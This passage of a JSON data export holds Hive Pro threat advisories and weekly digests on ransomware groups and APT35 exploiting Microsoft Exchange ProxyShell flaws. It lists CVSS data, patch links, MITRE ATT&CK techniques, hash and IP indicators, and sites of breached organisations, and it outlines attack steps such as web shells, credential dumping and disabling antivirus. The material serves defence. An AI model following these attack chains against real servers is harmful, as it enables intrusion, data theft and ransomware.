"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-07T13:24:49", "type": "hivepro", "title": "BlackByte ransomware exploits Microsoft Servers ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-12-07T13:24:49", "id": "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "href": "https://www.hivepro.com/blackbyte-ransomware-exploits-microsoft-servers-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T05:32:31", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here APT35 aka Magic Hound, an Iranian-backed threat group, has begun using Microsoft Exchange ProxyShell vulnerabilities as an initial attack vector and to execute code through multiple web shells. The group has primarily targeted organizations in the energy, government, and technology sectors based in the United States, the United Kingdom, Saudi Arabia, and the United Arab Emirates, among other countries. The threat actor exploits the Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access to create web shells and disable antivirus services on the victim\u2019s system. To gain persistence in the environment, the threat actor employs both account creation and scheduled tasks. For future re-entry, the account is added to the "remote desktop users" and "local administrator's users" groups. The threat actors use PowerShell to issue multiple commands to disable Windows Defender. Then they create a process memory dump from LSASS.exe that is zipped before exfiltration via web shell. The threat actor uses native Windows programs like "net" and "ipconfig" to enumerate the compromised server. A file masquerading as dllhost.exe is used to access certain domains for command and control. Therefore, data can be exfiltrated by the threat actor which could potentially resulting in information theft and espionage. The Microsoft Exchange ProxyShell vulnerabilities have been fixed in the latest updates from Microsoft. Organizations can patch these vulnerabilities using the patch links given below. The MITRE TTPs commonly used by APT35 are: TA0001: Initial AccessTA0002: ExecutionTA0003: PersistenceTA0004: Privilege EscalationTA0005: Defense EvasionTA0006: Credential AccessTA0007: DiscoveryTA0011: Command and ControlT1190: Exploit Public-Facing ApplicationT1003: OS Credential DumpingT1098: Account ManipulationT1078: Valid AccountsT1105: Ingress Tool TransferT1036: MasqueradingT1036.005: Masquerading: Match Legitimate Name or LocationT1543: Create or Modify System ProcessT1543.003: Create or Modify System Process: Windows ServiceT1505: Server Software ComponentT1505.003: Server Software Component: Web ShellT1082: System Information DiscoveryT1016: System Network Configuration DiscoveryT1033: System Owner/User DiscoveryT1059: Command and Scripting InterpreterT1059.003: Command and Scripting Interpreter: Windows Command Shell Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 References https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T04:05:09", "type": "hivepro", "title": "Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-25T04:05:09", "id": "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "href": "https://www.hivepro.com/magic-hound-exploiting-old-microsoft-exchange-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-22T15:39:16", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Hive Ransomware has been active since its discovery in June 2021, and it is constantly deploying different backdoors, including the Cobalt Strike beacon, on Microsoft Exchange servers that are vulnerable to ProxyShell (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) security flaws. The threat actors then conduct network reconnaissance, obtain admin account credentials, and exfiltrate valuable data before deploying the file-encrypting payload. Hive and their affiliates access their victims' networks by a variety of methods, including phishing emails with malicious attachments, compromised VPN passwords, and exploiting weaknesses on external-facing assets. Furthermore, Hive leaves a plain-text ransom letter threatening to disclose the victim's data on the TOR website 'HiveLeaks' if the victim does not meet the attacker's terms. The Organizations can mitigate the risk by following the recommendations: \u2022Use multi-factor authentication. \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. \u2022Enable protected files in the Windows Operating System for critical files. The MITRE ATT&CK TTPs used by Hive Ransomware are: TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and ControlTA0010: Exfiltration TA0040: ImpactT1190: Exploit Public-Facing ApplicationT1566: PhishingT1566.001: Spear-phishing attachmentT1106: Native APIT1204: User ExecutionT1204.002: Malicious FileT1059: Command and Scripting InterpreterT1059.001: PowerShellT1059.003: Windows Command ShellT1053: Scheduled Task/JobT1053.005: Scheduled TaskT1047: Windows Management InstrumentT1136: Create AccountT1136.002: Domain AccountT1078: Valid AccountsT1078.002: Domain AccountsT1053: Boot or logon autostart executionT1068: Exploitation for Privilege EscalationT1140: Deobfuscate/Decode Files or InformationT1070: Indicator Removal on Host T1070.001: Clear Windows Event LogsT1562: Impair DefensesT1562.001: Disable or Modify ToolsT1003: OS Credential DumpingT1003.005: Cached Domain Credentials|T1018: Remote System DiscoveryT1021: Remote ServicesT1021.001: Remote Desktop ProtocolT1021.002: SMB/Windows admin sharesT1021.006: Windows Remote ManagementT1083: File and directory discoveryT1057: Process discoveryT1063: Security software discoveryT1049: System Network Connections DiscoveryT1135: Network Share DiscoveryT1071: Application Layer ProtocolT1071.001: Web ProtocolsT1570: Lateral tool transfer1486: Data Encrypted for ImpactT1005: Data from local systemT1560: Archive Collected DataT1560.001: Archive via UtilityT1105: Ingress Tool TransferT1567: Exfiltration over web service Actor Details Vulnerability Details Indicators of Compromise (IoCs) Recent Breaches https://millsgrouponline.com/ https://www.fcch.com/ https://www.konradin.de/de/ https://www.pollmann.at/en https://www.emilfrey.ch/de https://rte.com.br/ https://www.friedrich.com/ https://powerhouse1.com/ https://www.hshi.co.kr/eng/ https://www.eurocoininteractive.nl/ https://www.itsinfocom.com/ https://www.pan-energy.com/ https://nsminc.com/ https://www.ucsiuniversity.edu.my/ https://kemlu.go.id/portal/id Patch Links https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 References https://www.varonis.com/blog/hive-ransomware-analysis https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T14:34:47", "type": "hivepro", "title": "Hive Ransomware targets organizations with ProxyShell exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-22T14:34:47", "id": "HIVEPRO:F2305684A25C735549865536AA4254BF", "href": "https://www.hivepro.com/hive-ransomware-targets-organizations-with-proxyshell-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-24T12:00:56", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202131.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nLockFile, a new ransomware gang, has been active since last week. LockFile began by using a publicly disclosed PetitPotam exploit (CVE-2021-36942) to compromise Windows Domain Controllers earlier this week. Using ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), they've now infiltrated many Microsoft Exchange Servers . The origins of this gang are most likely China. This gang used a similar ransomware note as of LokiBot and is been linked to Conti ransomware due to the email id provided (contact@contipauper[.]com). HivePro Threat Research team advises everyone to patch the vulnerabilities to prevent an attack.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/08/Screenshot-2021-08-24-143356-1024x387.png)\n\n#### Actor Details\n\n**Name** | **Target Locations** | **Target Sectors** | \n---|---|---|--- \nLockFile Ransomware | United States of America and Asia | Manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors | \n \n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 209.14.0.234 \nSHA-2 Hash | ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 \ncafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915 \n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 \n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f \n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 \n2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a \n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd \nc020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153 \na926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0 \n368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690 \nd030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a \na0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8 \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### References\n\n<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>\n\n<https://www.bleepingcomputer.com/news/security/lockfile-ransomware-uses-petitpotam-attack-to-hijack-windows-domains/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T10:35:48", "type": "hivepro", "title": "ProxyShell and PetitPotam exploits weaponized by LockFile Ransomware Group", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-24T10:35:48", "id": "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "href": "https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-27T15:34:57", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 430 5 2 Worldwide 17 46 The fourth week of April 2022 witnessed the discovery of 430 vulnerabilities out of which 5 gained the attention of Threat Actors and security researchers worldwide. Among these 5, there was 1 zero-day, and 1 vulnerability that was awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 5 CVEs that require immediate action. Further, we also observed Two Threat Actor groups being highly active in the last week. Lazarus, a North Korea threat actor group popular for financial crime and gain, was observed targeting blockchain technology and the cryptocurrency industry using a new malware TraderTraitor and Hive ransomware group was seen using the ProxyShell vulnerabilities to target organizations all around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34473 CVE-2021-34523 CVE-2021-31207 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 CVE-2022-0540 https://www.atlassian.com/software/jira/core/download https://www.atlassian.com/software/jira/update CVE-2022-29072* Not Available Active Actors: Icon Name Origin Motive Lazarus Group (APT38, BlueNoroff, and Stardust Chollima) North Korea Financial crime and gain Hive Ransomware Group Unknown Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1136: Create Account T1134: Access Token Manipulation T1134: Access Token Manipulation T1110: Brute Force T1083: File and Directory Discovery T1570: Lateral Tool Transfer T1560: Archive Collected Data T1071: Application Layer Protocol T1567: Exfiltration Over Web Service T1486: Data Encrypted for Impact T1588.005: Exploits T1566: Phishing T1059.007: JavaScript T1136.002: Domain Account T1543: Create or Modify System Process T1140: Deobfuscate/Decode Files or Information T1003: OS Credential Dumping T1135: Network Share Discovery T1021: Remote Services T1560.001: Archive via Utility T1071.001: Web Protocols T1496: Resource Hijacking T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.001: PowerShell T1053: Scheduled Task/Job T1068: Exploitation for Privilege Escalation T1562: Impair Defenses T1003.005: Cached Domain Credentials T1057: Process Discovery T1021.001: Remote Desktop Protocol T1005: Data from Local System T1105: Ingress Tool Transfer T1566.002: Spearphishing Link T1059.003: Windows Command Shell T1053.005: Scheduled Task T1053: Scheduled Task/Job T1562.001: Disable or Modify Tools T1018: Remote System Discovery T1021.002: SMB/Windows Admin Shares T1113: Screen Capture T1078: Valid Accounts T1106: Native API T1078: Valid Accounts T1053.005: Scheduled Task T1070: Indicator Removal on Host T1518: Software Discovery T1021.006: Windows Remote Management T1078.002: Domain Accounts T1053: Scheduled Task/Job T1078.002: Domain Accounts T1078: Valid Accounts T1553: Subvert Trust Controls T1518.001: Security Software Discovery T1053.005: Scheduled Task T1078.002: Domain Accounts T1078: Valid Accounts T1049: System Network Connections Discovery T1204: User Execution T1078.002: Domain Accounts T1204.002: Malicious File T1047: Windows Management Instrumentation Threat Advisories: Bypass Authentication vulnerability in Atlassian Jira Seraph Hive Ransomware targets organizations with ProxyShell exploit Lazarus is back, targeting organizations with cryptocurrency thefts via TraderTraitor malware What will be the consequence of this disputed vulnerability in 7-ZIP?", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T12:44:38", "type": "hivepro", "title": "Weekly Threat Digest: 18 \u2013 24 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-0540", "CVE-2022-29072"], "modified": "2022-04-27T12:44:38", "id": "HIVEPRO:09525E3475AC1C5F429611A90182E82F", "href": "https://www.hivepro.com/weekly-threat-digest-18-24-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:24:49", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency released threat advisories on AvosLocker Ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After it's affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploits Proxy Shell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855 to gain access to victim\u2019s machine and then they deploy Mimikatz to steal passwords. Furthermore, threat actors can use the detected credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and then encrypts the victim's documents and files with the ".avos" extension. The actor then leaves a ransom letter in each directory named "GET YOUR FILES BACK.txt" with a link to an AvosLocker .onion payment site. The Organizations can mitigate the risk by following the recommendations: \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. The MITRE TTPs commonly used by Avoslocker are: TA0001: Initial AccessTA0002: ExecutionTA0007: DiscoveryTA0040: ImpactT1566: PhishingT1204: User ExecutionT1082: System Information DiscoveryT1490: Inhibit System RecoveryT1489: Service StopT1486: Data Encrypted for Impact Actor Detail Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 Recent Breaches https://www.unical.com/ https://www.paccity.net/ https://www.gigabyte.com/ Reference https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection 